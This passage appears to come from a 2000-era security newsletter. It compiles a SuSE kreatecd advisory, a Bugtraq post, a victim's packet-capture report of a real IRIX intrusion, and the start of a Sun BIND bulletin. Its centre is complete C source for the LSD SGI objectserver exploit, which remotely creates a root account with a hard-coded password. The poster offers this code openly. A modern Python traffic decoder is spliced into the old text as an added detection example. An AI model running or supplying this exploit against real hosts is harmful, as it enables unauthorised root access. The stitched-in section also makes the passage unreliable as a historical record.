      The information within this paper may change without notice. Use of this 
      information constitutes acceptance for use in an AS IS condition. There
      are NO warranties with regard to this information. In no event shall the
      author be liable for any damages whatsoever arising out of or in
      connection with the use or spread of this information. Any use of this
      information is at the user's own risk.
      
      X-Force PGP Key available at:   http://xforce.iss.net/sensitive.php3 as 
      well as on MIT's PGP key server and PGP.com's key server.
      
      Please send suggestions, updates, and comments to:
      X-Force <xforce@iss.net> of Internet Security Systems, Inc.
      
      About Internet Security Systems
      
      Internet Security Systems (ISS) is the leading global provider of security
      management solutions for the Internet. By providing industry-leading
      SAFEsuite* security software, ePatrol* remote managed security services,
      and strategic consulting and education offerings, ISS is a trusted
      security provider to its customers and partners, protecting digital assets
      and ensuring safe and uninterrupted e-business. ISS' security management
      solutions protect more than 5,500 customers worldwide including 21 of the
      25 largest U.S. commercial banks, 10 of the largest telecommunications
      companies and over 35 government agencies. Founded in 1994, ISS is
      headquartered in Atlanta, GA, with additional offices throughout North
      America and international operations in Asia, Australia, Europe, Latin
      America and the Middle East. For more information, visit the Internet
      Security Systems web site at www.iss.net <http://www.iss.net>  or call 
      888-901-7477.
      
      Copyright (c) 2000 by Internet Security Systems, Inc.
      
      -----BEGIN PGP SIGNATURE-----
      Version: 2.6.3a
      Charset: noconv
      
      iQCVAwUBOOjlnzRfJiV99eG9AQHSOgQAj9D2ufzmwt8RyBRDZLzDCtdfTcG9KiaZ
      AbQfghGaav5IlYrSUEj2GFHj1KeLb2o8OCCnzVo5T1YFoIKC3L6ZxQ9q0Gsi2Pfv
      KXYGtYmNcOzQ5WIjUuBm1T2/ZXcL3cPYkfcMzyIKp0iddhx7noxuHJOffP1QTzm6
      /hbYgL+fum8=
      =bxur
      -----END PGP SIGNATURE-----
      
      
      
      
      @HWA            
      
255.0 PSS: suse kreatecd root compromise
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      -----BEGIN PGP SIGNED MESSAGE-----
      
      ______________________________________________________________________________
      
                              SuSE Security Announcement
      
              Package: kreatecd < 0.3.8b
              Date:    Wed,  5 Apr 2000 20:00:12 GMT
      
              Affected SuSE versions: 6.4
              Vulnerability Type:     local root compromise
              SuSE default package:   no
              Other affected systems: all unix systems using kreatecd
      ______________________________________________________________________________
      
      A security hole was discovered in the package mentioned above.
      Please update as soon as possible or disable the service if you are using
      this software on your SuSE Linux installation(s).
      
      Other Linux distributions or operating systems might be affected as
      well, please contact your vendor for information about this issue.
      
      Please note that we provide this information on an "as-is" basis only.
      There is no warranty whatsoever and no liability for any direct, indirect or
      incidental damage arising from this information or the installation of
      the update package.
      _____________________________________________________________________________
      
      1. Problem Description
      
        kreatecd is a KDE tool used to burn cd-roms.
        An exploitable buffer overflow was found in this tool.
      
      2. Impact
      
        Local users may gain root privilege.
      
      3. Solution
      
        Update the package from our FTP server, or remove the suid bit from this
        tool. ("chmod u-s /opt/kde/bin/kreatecd")
      ______________________________________________________________________________
      
      Please verify these md5 checksums of the updates before installing:
      
      742ed57b8bfb022d4e3755e417612272  ftp://ftp.suse.com/pub/suse/axp/update/6.4/kpa1/kreatecd-0.3.8b-0.alpha.rpm
      09cbe9a08cf2b0d5d5d0b1963c3edbcd  ftp://ftp.suse.com/pub/suse/i386/update/6.4/kpa1/kreatecd-0.3.8b-0.i386.rpm
      e59c71fa6ae5cf59af9aa1bdce89b015  ftp://ftp.suse.com/pub/suse/ppc/update/6.4/kpa1/kreatecd-0.3.8b-0.ppc.rpm
      ______________________________________________________________________________
      
      You can find updates on our ftp-Server:
      
        ftp://ftp.suse.com/pub/suse/i386/update for Intel processors
        ftp://ftp.suse.com/pub/suse/axp/update  for Alpha processors
      
      or try the following web pages for a list of mirrors:
        http://www.suse.de/ftp.html
        http://www.suse.com/ftp_new.html
      
      Our webpage for patches:
        http://www.suse.de/patches/index.html
      
      Our webpage for security announcements:
        http://www.suse.de/security
      
      If you want to report vulnerabilities, please contact
        security@suse.de
      ______________________________________________________________________________
      
      SuSE has got two free security mailing list services to which any
      interested party may subscribe:
      
      suse-security@suse.com          - moderated and for general/linux/SuSE
                                        security discussions. All SuSE security
                                        announcements are sent to this list.
      
      suse-security-announce@suse.com - SuSE's announce-only mailing list.
                                        Only SuSE's security announcements are sent
                                        to this list.
      
      To subscribe to the list, send a message to:
           <suse-security-subscribe@suse.com>
      
      To remove your address from the list, send a message to:
           <suse-security-unsubscribe@suse.com>
      
      Send mail to the following for info and FAQ for this list:
           <suse-security-info@suse.com>
           <suse-security-faq@suse.com>
      
      _____________________________________________________________________________
      
        This information is provided freely to everyone interested and may
        be redistributed provided that it is not altered in any way.
      
      Type Bits/KeyID    Date       User ID
      pub  2048/3D25D3D9 1999/03/06 SuSE Security Team <security@suse.de>
      
      
      
      -- 
      To unsubscribe, e-mail: suse-security-announce-unsubscribe@suse.com
      For additional commands, e-mail: suse-security-announce-help@suse.com
      
      
      @HWA            
      
      
256.0 PSS: irix object server remote root exploit
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      At 08:52 AM 3/29/2000 -0500, Howard wrote:
      >Since the patches are now officially released, I feel I can finally
      >release the details of the SGI objectserver vulnerability.  This
      >vulnerability was initially reported to CERT and SGI Security on
      >October 6, 1997.  A beta version of patch 2849 was provided in
      >February 1998.
      >
      
      Hi.  As a legitimate function of my work I routinely archive and catalog
      vulnerability information and exploit code.  In the interest of
      full-disclosure and in possibly helping system administrators evaluate
      the security of their SGI boxen, I am attaching the remote exploit for
      Irix objectserver (udp 5135).
      
      There are big problems with the US government right now - if you are
      doing security work (let alone cracking!) be advised that things are
      getting seriously fucked.  See the "L0phtcrack as a burglary tool"
      article?  See all these kids getting PRISON sentences for typing?  The
      government isn't playing by sane rules.  Be prepared.  Be awake!
      
      Marcy
      
      /*   Copyright (c) July 1997       Last Stage of Delirium   */
      /*      THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF      */
      /*                  Last Stage of Delirium                  */
      /*                                                          */
      /*   The contents of this file  may be disclosed to third   */
      /*   parties, copied and duplicated in any form, in whole   */
      /*   or in part, without the prior written consent of LSD.  */
      
      /*   SGI objectserver "account" exploit                              */
      /*   Remotely adds account to the IRIX system.                       */
      /*   Tested on IRIX 5.2, 5.3, 6.0.1, 6.1 and even 6.2,                */
      /*   which was supposed to be free from this bug (SGI 19960101-01-PX). */
      /*   The vulnerability "was corrected" on 6.2 systems but             */
      /*   SGI guys fucked up the job and it still can be exploited.        */
      /*   The same considers patched 5.x,6.0.1 and 6.1 systems             */
      /*   where SGI released patches DONT work.                            */
      /*   The only difference is that root account creation is blocked.    */
      /*                                                                    */
      /*   usage: ob_account ipaddr [-u username] [-i userid] [-p]          */
      /*       -i  specify userid (other than 0)                            */
      /*       -u  change the default added username                        */
      /*       -p  probe if there's the objectserver running                */
      /*                                                                    */
      /*   default account added       : lsd                                */
      /*   default password            : m4c10r4!                           */
      /*   default user home directory : /tmp/.new                          */
      /*   default userid              : 0                                  */
      
      
      #include <sys/types.h>
      #include <sys/socket.h>
      #include <netinet/in.h>
      #include <arpa/inet.h>
      #include <netdb.h>
      #include <sys/uio.h>
      #include <errno.h>
      #include <stdio.h>
      #include <stdlib.h>   /* exit(), atoi() */
      #include <string.h>   /* memcpy(), memcmp(), strcpy(), strlen() */
      #include <ctype.h>    /* isprint() */
      #include <unistd.h>   /* getopt() */
      /* struct msghdr is used in its 4.3BSD/IRIX form (msg_accrights fields) */
      #define E if(errno) perror("");
      
      struct iovec iov[2];
      struct msghdr msg;
      char buf1[1024],buf2[1024];
      int sck;
      unsigned long adr;
      
      void show_msg(){
          char *p,*p1;
          int i,j,c,d;
      
          c=0;
          printf("%04x   ",iov[0].iov_len);
          p=(char*)iov[0].iov_base;
          for(i=0;i<iov[0].iov_len;i++){
              c++;
              if(c==17){
                   printf("    ");
                   p1=p;p1=p1-16;
                   for(j=0;j<16;j++){
                       if(isprint(*p1)) printf("%c",*p1);
                       else printf(".");
                       p1++;
                   }
                   c=1;
                   printf("\n       ");
              }
              printf("%02x ",(unsigned char)*p++);
          }
          printf("    ");
          p1=p;p1=p1-c;
          if(c>1){
              for(i=0;i<(16-c);i++) printf("   ");
              for(i=0;i<c;i++){
                  if(isprint(*p1)) printf("%c",*p1);
                  else printf(".");
                  p1++;
              }
          }
          printf("\n");
          if(msg.msg_iovlen!=2) return;
      
          c=0;
          p=(char*)iov[0].iov_base;
          d=p[0x0a]*0x100+p[0x0b];
          p=(char*)iov[1].iov_base;
          printf("%04x   ",d);
          for(i=0;i<d;i++){
              c++;
              if(c==17){
                   printf("    ");
                   p1=p;p1=p1-16;
                   for(j=0;j<16;j++){
                       if(isprint(*p1)) printf("%c",*p1);
                       else printf(".");
                       p1++;
                   }
                   c=1;
                   printf("\n       ");
              }
              printf("%02x ",(unsigned char)*p++);
          }
          printf("    ");
          p1=p;p1=p1-c;
          if(c>1){
              for(i=0;i<(16-c);i++) printf("   ");
              for(i=0;i<c;i++){
                  if(isprint(*p1)) printf("%c",*p1);
                  else printf(".");
                  p1++;
              }
          }
          printf("\n");
          fflush(stdout);
      }
      
      char numer_one[0x10]={
      0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,
      0x00,0x00,0x00,0x24,0x00,0x00,0x00,0x00
      };
      
      char numer_two[0x24]={
      0x21,0x03,0x00,0x43,0x00,0x0a,0x00,0x0a,
      0x01,0x01,0x3b,0x01,0x6e,0x00,0x00,0x80,
      0x43,0x01,0x01,0x18,0x0b,0x01,0x01,0x3b,
      0x01,0x6e,0x01,0x02,0x01,0x03,0x00,0x01,
      0x01,0x07,0x01,0x01
      };
      
      char dodaj_one[0x10]={
      0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,
      0x00,0x00,0x01,0x2a,0x00,0x00,0x00,0x00
      };
      
      char dodaj_two[1024]={
      0x1c,0x03,0x00,0x43,0x02,0x01,0x1d,0x0a,
      0x01,0x01,0x3b,0x01,0x78
      };
      
      char dodaj_three[27]={
      0x01,0x02,0x0a,0x01,0x01,0x3b,
      0x01,0x78,0x00,0x00,0x80,0x43,0x01,0x10,
      0x17,0x0b,0x01,0x01,0x3b,0x01,0x6e,0x01,
      0x01,0x01,0x09,0x43,0x01
      };
      
      char dodaj_four[200]={
      0x17,0x0b,0x01,0x01,0x3b,0x01,0x02,
      0x01,0x01,0x01,0x09,0x43,0x01,0x03,0x4c,
      0x73,0x44,0x17,0x0b,0x01,0x01,0x3b,0x01,
      0x6e,0x01,0x06,0x01,0x09,0x43,0x00,0x17,
      0x0b,0x01,0x01,0x3b,0x01,0x6e,0x01,0x07,
      0x01,0x09,0x43,0x00,0x17,0x0b,0x01,0x01,
      0x3b,0x01,0x02,0x01,0x03,0x01,0x09,0x43,
      0x00,0x17,0x0b,0x01,0x01,0x3b,0x01,0x6e,
      0x01,0x09,0x01,0x09,0x43,0x00,0x17,0x0b,
      0x01,0x01,0x3b,0x01,0x6e,0x01,0x0d,0x01,
      0x09,0x43,0x00,0x17,0x0b,0x01,0x01,0x3b,
      0x01,0x6e,0x01,0x10,0x01,0x09,0x43,0x00,
      0x17,0x0b,0x01,0x01,0x3b,0x01,0x6e,0x01,
      0x0a,0x01,0x09,0x43,0x00,0x17,0x0b,0x01,
      0x01,0x3b,0x01,0x6e,0x01,0x0e,0x01,0x03,
      0x01,0x09,0x17,0x0b,0x01,0x01,0x3b,0x01,
      0x6e,0x01,0x04,0x01,0x09,0x43,0x01,0x0d,
      0x61,0x6b,0x46,0x4a,0x64,0x78,0x65,0x6e,
      0x4b,0x6e,0x79,0x53,0x2e,0x17,0x0b,0x01,
      0x01,0x3b,0x01,0x6e,0x01,0x11,0x01,0x09,
      0x43,0x01,0x09,0x2f,0x74,0x6d,0x70,0x2f,
      0x2e,0x6e,0x65,0x77,0x17,0x0b,0x01,0x01,
      0x3b,0x01,0x6e,0x01,0x12,0x01,0x09,0x43,
      0x01,0x04,0x72,0x6f,0x6f,0x74,0x17,0x0b,
      0x01,0x01,0x3b,0x01,0x6e,0x01,0x02,0x01,
      0x03
      };
      
      char dodaj_five[39]={
      0x17,0x0b,0x01,0x01,0x3b,0x01,
      0x6e,0x01,0x13,0x01,0x09,0x43,0x01,0x08,
      0x2f,0x62,0x69,0x6e,0x2f,0x63,0x73,0x68,
      0x17,0x0b,0x01,0x01,0x3b,0x01,0x6e,0x01,
      0x0f,0x01,0x09,0x43,0x01,0x03,'L','S','D'
      };
      
      char fake_adrs[0x10]={
      0x00,0x02,0x14,0x0f,0xff,0xff,0xff,0xff,
      0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
      };
      
      char *get_sysinfo(){
          int i=0,j,len;
      
          iov[0].iov_base=numer_one;
          iov[0].iov_len=0x10;
          iov[1].iov_base=numer_two;
          iov[1].iov_len=0x24;
          msg.msg_name=(caddr_t)fake_adrs;
          msg.msg_namelen=0x10;
          msg.msg_iov=iov;
          msg.msg_iovlen=2;
          msg.msg_accrights=(caddr_t)0;
          msg.msg_accrightslen=0;
          printf("SM:  --[0x%04x bytes]--\n",sendmsg(sck,&msg,0)); show_msg();
          printf("\n");
      
          iov[0].iov_base=buf1;
          iov[1].iov_base=buf2;
          iov[1].iov_len=0x200;
          msg.msg_iovlen=2;
          printf("RM:  --[0x%04x bytes]--\n",len=recvmsg(sck,&msg,0)); show_msg();
          printf("\n");
          while(i<len-0x16)
              if(!memcmp("\x0a\x01\x01\x3b\x01\x78",&buf2[i],6)){
                  printf("remote system ID: ");
                  for(j=0;j<buf2[i+6];j++) printf("%02x ",buf2[i+7+j]);
                  printf("\n");
                  return(&buf2[i+6]);
              }else i++;
          return(0);
      }
      
      void new_account(int len){
          iov[0].iov_base=dodaj_one;
          iov[0].iov_len=0x10;
          iov[1].iov_base=dodaj_two;
          iov[1].iov_len=len;
          msg.msg_name=(caddr_t)fake_adrs;
          msg.msg_namelen=0x10;
          msg.msg_iov=iov;
          msg.msg_iovlen=2;
          msg.msg_accrights=(caddr_t)0;
          msg.msg_accrightslen=0;
          printf("SM:  --[0x%04x bytes]--\n",sendmsg(sck,&msg,0)); show_msg();
          printf("\n");
      
          iov[0].iov_base=buf1;
          iov[1].iov_base=buf2;
          iov[1].iov_len=0x200;
          msg.msg_iovlen=2;
          printf("RM:  --[0x%04x bytes]--\n",recvmsg(sck,&msg,0)); show_msg();
          printf("\n");
      }
      
      void info(char *text){
          printf("SGI objectserver \"account\" exploit by LSD\n");
          printf("usage: %s ipaddr [-u username] [-i userid] [-p]\n",text);
      }
      
      int main(int argc,char **argv){
          int c,user,version,probe;
          unsigned int offset,gr_offset,userid;
          char *sys_info;
          char username[20];
          extern char *optarg;
          extern int optind;
      
          if(argc<2) {info(argv[0]);exit(0);}
          optind=2;
          offset=40;
          user=version=probe=0;
          while((c=getopt(argc,argv,"u:i:p"))!=-1)
              switch(c){
              case 'u': /* username is later length-prefixed in one byte and copied into a fixed buffer */
                        if(strlen(optarg)>=sizeof(username)){info(argv[0]);exit(1);}
                        strcpy(username,optarg);
                        user=1;
                        break;
              case 'i': version=62;
                        userid=atoi(optarg);
                        break;
              case 'p': probe=1;
                        break;
              case '?':
              default : info(argv[0]);
                        exit(1);
              }
      
          sck=socket(AF_INET,SOCK_DGRAM,0);
          adr=inet_addr(argv[1]);
          memcpy(&fake_adrs[4],&adr,4);
      
          if(!(sys_info=get_sysinfo())){
              printf("error: can't get system ID for %s.\n",argv[1]);
              exit(1);
          }
          if(!probe){
              memcpy(&dodaj_two[0x0d],sys_info,sys_info[0]+1);
              memcpy(&dodaj_two[0x0d+sys_info[0]+1],&dodaj_three[0],27);
              offset+=sys_info[0]+1;
      
              if(!user) strcpy(username,"lsd");
              dodaj_two[offset++]=strlen(username);
              strcpy(&dodaj_two[offset],username);offset+=strlen(username);
              memcpy(&dodaj_two[offset],&dodaj_four[0],200);
              offset+=200;
              gr_offset=offset-15;
              if(version){
                  dodaj_two[gr_offset++]='u';
                  dodaj_two[gr_offset++]='s';
                  dodaj_two[gr_offset++]='e';
                  dodaj_two[gr_offset++]='r';
                  dodaj_two[offset++]=0x02;
                  dodaj_two[offset++]=userid>>8;
                  dodaj_two[offset++]=userid&0xff;
              }
              else dodaj_two[offset++]=0x00;
      
              memcpy(&dodaj_two[offset],&dodaj_five[0],39);
              offset+=39;
              dodaj_one[10]=offset>>8;
              dodaj_one[11]=offset&0xff;
              new_account(offset);
          }
          return 0;
      }
      /* end g23 exploit post */
      
      
      
      
      
      
      Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
      From: "Howard M. Kash III" <hmkash@ARL.MIL>
      Subject:      Objectserver vulnerability
      X-To:         BUGTRAQ@securityfocus.com
      
      
      Since the patches are now officially released, I feel I can finally
      release the details of the SGI objectserver vulnerability.  This
      vulnerability was initially reported to CERT and SGI Security on
      October 6, 1997.  A beta version of patch 2849 was provided in
      February 1998.
      
      
      Howard
      
      
      ----- Forwarded message # 1:
      
      Date:     Mon, 6 Oct 97 7:09:51 EDT
      From:     "Howard M. Kash III"
      To:       cert@cert.org, security-alert@sgi.com
      Subject:  URGENT - new SGI vulnerability
      
      
      -----BEGIN PGP SIGNED MESSAGE-----
      
      
      URGENT * URGENT * URGENT * URGENT * URGENT * URGENT * URGENT * URGENT
      
      SGI objectserver vulnerability allows remote users to create accounts.
      
      Yesterday two of our hosts were compromised by an (as far as I could
      determine) unknown, unpatched bug in SGI's objectserver.  The attack
      consisted of sending UDP packets to port 5135 (see below).  The
      result was a non-root account being added to the system.  The two
      compromised hosts were running IRIX 6.2, but the vulnerability may
      affect other versions of IRIX.  The vulnerability does not appear to
      give root access directly, as the attackers used other IRIX
      vulnerabilities to gain root access after logging into the new
      account.
      
      Attached are the UDP packets exchanged between the attacking host
      (aaa.aaa.aaa.aaa) and the target host (ttt.ttt.ttt.ttt).  IP
      addresses have been masked to protect the guilty - I mean innocent
      until proven guilty.  The result of this sequence of packets is the
      following line added to /etc/passwd:
      
          gueust:x:5002:20:LsD:/tmp/.new:/bin/csh
      
      An entry must also be added to /etc/shadow since the attacker then
      logs into the new account with a password.
      
      As a temporary measure we have blocked all traffic to port 5135 at
      our gateway.
      
      
      Howard Kash
      U.S. Army Research Lab
      
      ------------------------------------------------------------------------
      
      TCP and UDP headers have been separated out.  I've decoded some of the
      packet contents into their ASCII equivalent below the line.
      
      16:52:00.631310 aaa.aaa.aaa.aaa.4394 > ttt.ttt.ttt.ttt.5135: udp 52
                               4500 0050 7d95 0000 2a11 bfb5 aaaa aaaa
                               tttt tttt
                                         112a 140f 003c 6516
                                                             0001 0000
                               0001 0000 0000 0024 0000 0000 2103 0043
                               000a 000a 0101 3b01 6e00 0080 4301 0118
                               0b01 013b 016e 0102 0103 0001 0107 0101
      16:52:00.638455 ttt.ttt.ttt.ttt.5135 > aaa.aaa.aaa.aaa.4394: udp 95
                               4500 007b 0644 0000 3a11 26dc tttt tttt
                               aaaa aaaa
                                         140f 112a 0067 0d37
                                                             0001 0186
                               0001 0000 0000 004f 0000 0000 2903 0043
                               000a 0080 4300 8043 0105 0a01 013b 0178
                               0469 0a79 9a01 330a 0101 3b01 7804 690a
                               799a 0138 0a01 013b 0178 0469 0a79 9a01
                               020a 0101 3b01 7804 690a 799a 0103 0a01
                               013b 0178 0469 0a79 9a01 04
      16:52:00.794985 aaa.aaa.aaa.aaa.4394 > ttt.ttt.ttt.ttt.5135: udp 312
                               4500 0154 7da3 0000 2a11 bea3 aaaa aaaa
                               tttt tttt
                                         112a 140f 0140 a1b2
                                                             0001 0000
                               0001 0000 0000 0128 0000 0000 1c03 0043
                               0201 1d0a 0101 3b01 7804 690a 799a 0102
                               0a01 013b 0178 0000 8043 0110 170b 0101
                               3b01 6e01 0101 0943 0106 6775 6575 7374
                                                        g u  e u  s t
                               170b 0101 3b01 0201 0101 0943 0103 4c73
                                                                  L s
                               4417 0b01 013b 016e 0106 0109 4300 170b
                               D
                               0101 3b01 6e01 0701 0943 0017 0b01 013b
                               0102 0103 0109 4300 170b 0101 3b01 6e01
                               0901 0943 0017 0b01 013b 016e 010d 0109
                               4300 170b 0101 3b01 6e01 1001 0943 0017
                               0b01 013b 016e 010a 0109 4300 170b 0101
                               3b01 6e01 0e01 0301 0917 0b01 013b 016e
                               0104 0109 4301 0d61 6b46 4a64 7865 6e4b
                               6e79 532e 170b 0101 3b01 6e01 1101 0943
                               0109 2f74 6d70 2f2e 6e65 7717 0b01 013b
                                    / t  m p  / .  n e  w
                               016e 0112 0109 4301 0470 6f6f 7417 0b01
                               013b 016e 0102 0103 0017 0b01 013b 016e
                               0113 0109 4301 082f 6269 6e2f 6373 6817
                                                /  b i  n /  c s  h
                               0b01 013b 016e 010f 0109 4301 074c 7344
                               2f43 5444
      16:52:00.921356 ttt.ttt.ttt.ttt.5135 > aaa.aaa.aaa.aaa.4394: udp 41
                               4500 0045 0646 0000 3a11 2710 tttt tttt
                               aaaa aaaa
                                         140f 112a 0031 0ef5
                                                             0001 0187
                               0001 0000 0000 0019 0000 0000 2503 0043
                               0201 1d0a 0080 4300 0a01 013b 0178 0469
                               0a79 9a01 39
      16:53:33.226155 aaa.aaa.aaa.aaa.4399 > ttt.ttt.ttt.ttt.5135: udp 52
                               4500 0050 8f33 0000 2a11 ae17 aaaa aaaa
                               tttt tttt
                                         112f 140f 003c 6511
                                                             0001 0000
                               0001 0000 0000 0024 0000 0000 2103 0043
                               000a 000a 0101 3b01 6e00 0080 4301 0118
                               0b01 013b 016e 0102 0103 0001 0107 0101
      16:53:33.232248 ttt.ttt.ttt.ttt.5135 > aaa.aaa.aaa.aaa.4399: udp 108
                               4500 0088 0669 0000 3a11 26aa tttt tttt
                               aaaa aaaa
                                         140f 112f 0074 3f4f
                                                             0001 0188
                               0001 0000 0000 005c 0000 0000 2903 0043
                               000a 0080 4300 8043 0106 0a01 013b 0178
                               0469 0a79 9a01 330a 0101 3b01 7804 690a
                               799a 0138 0a01 013b 0178 0469 0a79 9a01
                               390a 0101 3b01 7804 690a 799a 0102 0a01
                               013b 0178 0469 0a79 9a01 030a 0101 3b01
                               7804 690a 799a 0104
      16:53:33.420972 aaa.aaa.aaa.aaa.4399 > ttt.ttt.ttt.ttt.5135: udp 314
                               4500 0156 8f3e 0000 2a11 ad06 aaaa aaaa
                               tttt tttt
                                         112f 140f 0142 1399
                                                             0001 0000
                               0001 0000 0000 012a 0000 0000 1c03 0043
                               0201 1d0a 0101 3b01 7804 690a 799a 0102
                               0a01 013b 0178 0000 8043 0110 170b 0101
                               3b01 6e01 0101 0943 0106 6775 6575 7374
                               170b 0101 3b01 0201 0101 0943 0103 4c73
                               4417 0b01 013b 016e 0106 0109 4300 170b
                               0101 3b01 6e01 0701 0943 0017 0b01 013b
                               0102 0103 0109 4300 170b 0101 3b01 6e01
                               0901 0943 0017 0b01 013b 016e 010d 0109
                               4300 170b 0101 3b01 6e01 1001 0943 0017
                               0b01 013b 016e 010a 0109 4300 170b 0101
                               3b01 6e01 0e01 0301 0917 0b01 013b 016e
                               0104 0109 4301 0d61 6b46 4a64 7865 6e4b
                               6e79 532e 170b 0101 3b01 6e01 1101 0943
                               0109 2f74 6d70 2f2e 6e65 7717 0b01 013b
                               016e 0112 0109 4301 0475 7365 7217 0b01
                               013b 016e 0102 0103 0213 8a17 0b01 013b
                               016e 0113 0109 4301 082f 6269 6e2f 6373
                               6817 0b01 013b 016e 010f 0109 4301 074c
                               7344 2f43 5444
      16:53:33.580619 ttt.ttt.ttt.ttt.5135 > aaa.aaa.aaa.aaa.4399: udp 41
                               4500 0045 0671 0000 3a11 26e5 tttt tttt
                               aaaa aaaa
                                         140f 112f 0031 0dee
                                                             0001 0189
                               0001 0000 0000 0019 0000 0000 2503 0043
                               0201 1d0a 0080 4300 0a01 013b 0178 0469
                               0a79 9a01 3a
      
      
      
      ----- End of forwarded messages
      
      
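      The probe-then-add exchange captured above can be decoded mechanically for detection and forensic triage. The decoder below is an added example, not code from Howard's post or from LSD: its record grammar and field names are inferred from the exploit arrays and the tcpdump hex on this page rather than from any SGI documentation, and its sample payloads are transcribed from the dump above.

```python
"""Decoder and detection check for the IRIX objectserver (UDP/5135) account-add
request captured in the Bugtraq post above.  The wire format is inferred from
this page (exploit arrays plus tcpdump hex), not from SGI documentation:
a 16-byte header whose bytes 10-11 hold the big-endian body length (show_msg()
reads p[0x0a]*0x100+p[0x0b]), then the body.  Account-add bodies start
1c 03 00 43 (dodaj_two); system-ID probes start 21 03 00 43 (numer_two).
Each account attribute is a record  17 0b 01 01 3b 01 <ns> 01 <field> <type> <value>
with <type> 01 09 43 = string (00 empty, else 01 <len> <bytes>) and
<type> 01 03 = big-endian integer (<len> <bytes>, len 0 = empty).
"""
OBJECTSERVER_PORT = 5135
HEADER_LEN = 16
KIND_ADD_ACCOUNT = b"\x1c\x03\x00\x43"
KIND_SYSINFO = b"\x21\x03\x00\x43"
RECORD_MARK = b"\x17\x0b\x01\x01\x3b\x01"
TYPE_STRING = b"\x01\x09\x43"
TYPE_INT = b"\x01\x03"

# (ns, field) -> name.  username/uid/home/shell are confirmed by the resulting
# /etc/passwd line (gueust:x:5002:20:LsD:/tmp/.new:/bin/csh); "group" and
# "passwd_hash" (a 13-char crypt(3)-style string) are inferred from the dumps.
FIELD_NAMES = {
    (0x6E, 0x01): "username", (0x6E, 0x02): "uid", (0x6E, 0x04): "passwd_hash",
    (0x6E, 0x11): "home", (0x6E, 0x12): "group", (0x6E, 0x13): "shell",
}

def parse_header(payload):
    """Check the 16-byte header and return exactly the body it announces."""
    if len(payload) < HEADER_LEN:
        raise ValueError("datagram shorter than objectserver header")
    body_len = (payload[10] << 8) | payload[11]
    body = payload[HEADER_LEN:HEADER_LEN + body_len]
    if len(body) != body_len:
        raise ValueError(f"header announces {body_len} body bytes, got {len(body)}")
    return body

def parse_records(body):
    """Walk the attribute records; returns (ns, field, value) triples."""
    records, pos = [], body.find(RECORD_MARK)
    while pos != -1:
        i = pos + len(RECORD_MARK)
        ns, fid = body[i], body[i + 2]
        i += 3
        if body[i:i + 3] == TYPE_STRING:
            i += 3
            if body[i] == 0x00:                   # empty string attribute
                value, i = None, i + 1
            else:                                 # 01 <len> <bytes>
                n = body[i + 1]
                value = body[i + 2:i + 2 + n].decode("ascii", "replace")
                i += 2 + n
        elif body[i:i + 2] == TYPE_INT:
            i += 2
            n = body[i]
            value = int.from_bytes(body[i + 1:i + 1 + n], "big") if n else None
            i += 1 + n
        else:
            raise ValueError(f"unknown attribute encoding at body offset {i}")
        records.append((ns, fid, value))
        pos = body.find(RECORD_MARK, i)
    return records

def inspect_datagram(dst_port, payload):
    """Classify one UDP datagram; None when it is not objectserver traffic."""
    if dst_port != OBJECTSERVER_PORT:
        return None
    body = parse_header(payload)
    if body.startswith(KIND_SYSINFO):
        return {"kind": "sysinfo-probe"}
    if not body.startswith(KIND_ADD_ACCOUNT):
        return {"kind": "other"}
    finding = {"kind": "add-account"}
    for ns, fid, value in parse_records(body):
        name = FIELD_NAMES.get((ns, fid))
        if name and value is not None:
            finding[name] = value
    return finding

# Payloads transcribed from the tcpdump hex in the post: the 52-byte probe and
# the 314-byte request that produced the uid-5002 account (constructed input).
SYSINFO_PROBE = bytes.fromhex(
    "0001 0000 0001 0000 0000 0024 0000 0000"
    "2103 0043 000a 000a 0101 3b01 6e00 0080 4301 0118 0b01 013b 016e 0102 0103 0001"
    "0107 0101"
)
ACCOUNT_ADD_REQUEST = bytes.fromhex(
    "0001 0000 0001 0000 0000 012a 0000 0000"
    "1c03 0043 0201 1d0a 0101 3b01 7804 690a 799a 0102 0a01 013b 0178 0000 8043 0110"
    "170b 0101 3b01 6e01 0101 0943 0106 6775 6575 7374 170b 0101 3b01 0201 0101 0943"
    "0103 4c73 4417 0b01 013b 016e 0106 0109 4300 170b 0101 3b01 6e01 0701 0943 0017"
    "0b01 013b 0102 0103 0109 4300 170b 0101 3b01 6e01 0901 0943 0017 0b01 013b 016e"
    "010d 0109 4300 170b 0101 3b01 6e01 1001 0943 0017 0b01 013b 016e 010a 0109 4300"
    "170b 0101 3b01 6e01 0e01 0301 0917 0b01 013b 016e 0104 0109 4301 0d61 6b46 4a64"
    "7865 6e4b 6e79 532e 170b 0101 3b01 6e01 1101 0943 0109 2f74 6d70 2f2e 6e65 7717"
    "0b01 013b 016e 0112 0109 4301 0475 7365 7217 0b01 013b 016e 0102 0103 0213 8a17"
    "0b01 013b 016e 0113 0109 4301 082f 6269 6e2f 6373 6817 0b01 013b 016e 010f 0109"
    "4301 074c 7344 2f43 5444"
)
```

      Calling inspect_datagram(5135, ACCOUNT_ADD_REQUEST) yields the username, uid, group, home and shell that appear in the /etc/passwd line above, which is the check a sensor watching UDP/5135 would alert on.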
      
      
      @HWA            
      
257.0 PSS: Sun bind advisory
      ~~~~~~~~~~~~~~~~~~~~~~
      
      -----BEGIN PGP SIGNED MESSAGE-----
      
      ________________________________________________________________________________
                         Sun Microsystems, Inc. Security Bulletin
                      
      Bulletin Number:        #00194
      Date:                   March 29, 2000
      Cross-Ref:              CERT Advisory CA-99-14
      Title:                  BIND
      ________________________________________________________________________________
      
      The information contained in this Security Bulletin is provided "AS IS." 
      Sun makes no warranties of any kind whatsoever with respect to the information 
      contained in this Security Bulletin. ALL EXPRESS OR IMPLIED CONDITIONS, 
      REPRESENTATIONS AND WARRANTIES, INCLUDING ANY WARRANTY OF NON-INFRINGEMENT OR 
      IMPLIED WARRANTY OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE, ARE 
      HEREBY DISCLAIMED AND EXCLUDED TO THE EXTENT ALLOWED BY APPLICABLE LAW.
      
      IN NO EVENT WILL SUN MICROSYSTEMS, INC. BE LIABLE FOR ANY LOST REVENUE, 
